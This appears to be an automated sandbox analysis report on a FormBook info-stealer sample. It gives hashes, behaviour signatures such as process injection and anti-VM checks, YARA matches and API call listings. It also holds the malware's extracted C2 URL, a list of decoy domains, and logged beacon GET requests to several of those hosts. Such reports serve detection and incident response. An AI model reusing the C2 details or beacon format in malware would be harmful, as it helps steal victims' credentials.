Analysis Report ox87DNNM8d.exe

Overview

General Information

Sample Name: ox87DNNM8d.exe
Analysis ID: 411767
MD5: 41e38bcd6f5f3001c2e4f08ebcd2396c
SHA1: 2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
SHA256: 4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.panda810.com/sve/"], "decoy": ["rockouqe.com", "secureproductsolutions.net", "josephserino.com", "operationstrategy.com", "umrohalfatih.com", "humanityenlightened.com", "taylorxgroup.com", "francescopetroni.net", "anaume-kun.com", "galleryalireza.com", "alimamavn.com", "tym0769.com", "trendselection.club", "warmupspod.com", "v-work.xyz", "aclmspecialmeeting2020.com", "youporn-live.net", "germinatebio.net", "hempnseeds.com", "ezfto.com", "pengruncapital.com", "voxitor.com", "hempdivasmag.com", "everydayleadershipinstitute.com", "biking-division.com", "livingstonemoments.com", "vstarfireworks.com", "abilitybrazil.com", "gixaa.com", "kp-dental.com", "developmentignited.com", "8155a.com", "petylook.com", "agrogroupkz.com", "germsbuzzter.com", "valley-bitcoin.com", "dcsdeliveryaz.website", "elitefriendlies.com", "pinoywebtools.com", "circuleather.com", "mioskinplus.info", "tamaraog.com", "maxfelicitavideo.com", "americacivics.com", "shebawatches.com", "meisammirhashemi.com", "nelivo.com", "real-dating-clubs2.com", "poishem.directory", "geminein.club", "soundalchemyadvanced.com", "kidswrtingpadstore.com", "cya-wonder.club", "tuqof.com", "showbizpr.com", "homo-nomad.com", "bcc-cbd.com", "papayacrisp.com", "paymentink.gold", "purejoyclothing.com", "newsadvices.com", "gungalmata.com", "viewsfromthedriversseat.com", "techriew.com"]}
Multi AV Scanner detection for submitted file
Source: ox87DNNM8d.exe Virustotal: Detection: 56% Perma Link
Source: ox87DNNM8d.exe Metadefender: Detection: 38% Perma Link
Source: ox87DNNM8d.exe ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: ox87DNNM8d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: ox87DNNM8d.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 4x nop then pop edi 3_2_00416C6A
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 4x nop then pop edi 3_2_0040E42F
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 8_2_0017E42F
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 8_2_00186C6A

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.panda810.com/sve/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1Host: www.dcsdeliveryaz.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1Host: www.americacivics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1Host: www.vstarfireworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: Joe Sandbox View ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
Source: unknown DNS traffic detected: queries for: www.secureproductsolutions.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-storePragma: no-cacheContent-Type: text/htmlServer: IISX-Powered-By: WAF/2.0Date: Wed, 12 May 2021 05:07:40 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-si
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419D50 NtCreateFile, 3_2_00419D50
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419E00 NtReadFile, 3_2_00419E00
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419E80 NtClose, 3_2_00419E80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419F30 NtAllocateVirtualMemory, 3_2_00419F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419D4B NtCreateFile, 3_2_00419D4B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419DFC NtReadFile, 3_2_00419DFC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9840 NtDelayExecution,LdrInitializeThunk, 8_2_045D9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_045D9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9540 NtReadFile,LdrInitializeThunk, 8_2_045D9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_045D9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D95D0 NtClose,LdrInitializeThunk, 8_2_045D95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D99A0 NtCreateSection,LdrInitializeThunk, 8_2_045D99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A50 NtCreateFile,LdrInitializeThunk, 8_2_045D9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9650 NtQueryValueKey,LdrInitializeThunk, 8_2_045D9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_045D9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D96D0 NtCreateKey,LdrInitializeThunk, 8_2_045D96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_045D96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9710 NtQueryInformationToken,LdrInitializeThunk, 8_2_045D9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9FE0 NtCreateMutant,LdrInitializeThunk, 8_2_045D9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9780 NtMapViewOfSection,LdrInitializeThunk, 8_2_045D9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DB040 NtSuspendThread, 8_2_045DB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9820 NtEnumerateKey, 8_2_045D9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D98F0 NtReadVirtualMemory, 8_2_045D98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D98A0 NtWriteVirtualMemory, 8_2_045D98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9950 NtQueueApcThread, 8_2_045D9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9560 NtWriteFile, 8_2_045D9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DAD30 NtSetContextThread, 8_2_045DAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9520 NtWaitForSingleObject, 8_2_045D9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D99D0 NtCreateProcessEx, 8_2_045D99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D95F0 NtQueryInformationFile, 8_2_045D95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9670 NtQueryInformationProcess, 8_2_045D9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9610 NtEnumerateValueKey, 8_2_045D9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A10 NtQuerySection, 8_2_045D9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A00 NtProtectVirtualMemory, 8_2_045D9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A20 NtResumeThread, 8_2_045D9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A80 NtOpenDirectoryObject, 8_2_045D9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9770 NtSetInformationFile, 8_2_045D9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA770 NtOpenThread, 8_2_045DA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9760 NtOpenProcess, 8_2_045D9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA710 NtOpenProcessToken, 8_2_045DA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9B00 NtSetValueKey, 8_2_045D9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9730 NtQueryVirtualMemory, 8_2_045D9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA3B0 NtGetContextThread, 8_2_045DA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D97A0 NtUnmapViewOfSection, 8_2_045D97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189D50 NtCreateFile, 8_2_00189D50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189E00 NtReadFile, 8_2_00189E00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189E80 NtClose, 8_2_00189E80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189F30 NtAllocateVirtualMemory, 8_2_00189F30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189D4B NtCreateFile, 8_2_00189D4B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189DFC NtReadFile, 8_2_00189DFC
Detected potential crypto function
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B58782 1_2_00B58782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B55D17 1_2_00B55D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B54765 1_2_00B54765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0160C1D0 1_2_0160C1D0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_01609890 1_2_01609890
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420F30 1_2_06420F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06427C80 1_2_06427C80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642E228 1_2_0642E228
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420040 1_2_06420040
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064280F8 1_2_064280F8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642C1D8 1_2_0642C1D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06429600 1_2_06429600
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06421E18 1_2_06421E18
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06421E28 1_2_06421E28
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420E38 1_2_06420E38
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064236A9 1_2_064236A9
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064236B8 1_2_064236B8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06427C72 1_2_06427C72
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642CC10 1_2_0642CC10
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064234C8 1_2_064234C8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064234D8 1_2_064234D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5B3F5 1_2_00B5B3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B56759 1_2_00B56759
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041D21B 3_2_0041D21B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041DBED 3_2_0041DBED
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409DEB 3_2_00409DEB
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402D87 3_2_00402D87
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409E30 3_2_00409E30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CF96 3_2_0041CF96
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB5D17 3_2_00FB5D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB8782 3_2_00FB8782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB4765 3_2_00FB4765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBB3F5 3_2_00FBB3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB6759 3_2_00FB6759
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651002 8_2_04651002
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB090 8_2_045AB090
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04661D55 8_2_04661D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459F900 8_2_0459F900
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04590D20 8_2_04590D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B6E30 8_2_045B6E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045CEBB0 8_2_045CEBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018D21B 8_2_0018D21B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172D90 8_2_00172D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172D87 8_2_00172D87
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00179DEB 8_2_00179DEB
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00179E30 8_2_00179E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0018CF96 8_2_0018CF96
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00172FB0 8_2_00172FB0
Sample file is different than original file name gathered from version info
Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ox87DNNM8d.exe
